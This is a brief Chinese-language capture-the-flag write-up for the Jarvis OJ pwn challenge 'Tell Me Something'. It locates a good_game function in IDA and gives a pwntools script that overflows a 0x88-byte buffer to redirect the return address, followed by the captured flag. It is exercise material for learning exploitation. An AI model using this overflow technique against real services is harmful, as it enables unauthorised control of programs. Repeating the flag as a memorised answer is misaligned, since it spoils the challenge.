Jarvis OJ-PWN-Tell Me Something wp

开启了NX保护 说明栈中数据没有执行权限

拖到IDA里看一下

通过观察IDA左侧的函数栏可以看到一个good_game函数
点进去观察

我们看到了flag.txt 可以想到flag应该就在这个txt文档里
于是我们就可以让溢出的返回地址为good_game函数
通过cyclic或者IDA来获取长度

from pwn import *

#p=process("./guestbook")

con=remote("pwn.jarvisoj.com","9876")
e=ELF("./guestbook")
con.recvline()
game_addr=e.symbols["good_game"]
payload="a"*0x88+p64(game_addr)

con.sendline(payload)
con.recvline()
con.interactive()

PCTF{This_is_J4st_Begin}